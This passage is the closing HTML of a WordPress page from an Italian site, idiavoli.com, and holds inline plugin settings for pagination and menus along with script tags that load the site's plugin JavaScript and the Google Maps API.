var wpv_pagination_local = {"front_ajaxurl":"http:\/\/www.idiavoli.com\/wp-admin\/admin-ajax.php","ajax_pagination_url":"http:\/\/www.idiavoli.com\/wpv-ajax-pagination\/","ajax_pagination_url_safe":"http:\/\/www.idiavoli.com\/wp-content\/plugins\/wp-views\/embedded\/inc\/wpv-ajax-pagination-default.php","calendar_image":"http:\/\/www.idiavoli.com\/wp-content\/plugins\/wp-views\/embedded\/res\/img\/calendar.gif","calendar_text":"Seleziona data","datepicker_min_date":null,"datepicker_max_date":null,"resize_debounce_tolerance":"100"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/wp-views/embedded/res/js/wpv-pagination-embedded.js?ver=1.12.1'></script>
<script type='text/javascript' src='http://maps.googleapis.com/maps/api/js?sensor=false&#038;libraries=places&#038;ver=3.5.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var ubermenu_data = {"remove_conflicts":"on","reposition_on_load":"off","intent_delay":"300","intent_interval":"100","intent_threshold":"7","scrollto_offset":"50","scrollto_duration":"1000","responsive_breakpoint":"959","accessible":"on","retractor_display_strategy":"responsive","touch_off_close":"on","collapse_after_scroll":"on","v":"3.2.4","configurations":["main"],"ajax_url":"http:\/\/www.idiavoli.com\/wp-admin\/admin-ajax.php","plugin_url":"http:\/\/www.idiavoli.com\/wp-content\/plugins\/ubermenu\/"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/ubermenu/assets/js/ubermenu.min.js?ver=3.2.4'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-includes/js/wp-embed.min.js?ver=4.4.15'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.11.1'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/gravityforms/js/placeholders.jquery.min.js?ver=1.9.17.14'></script>
</html> 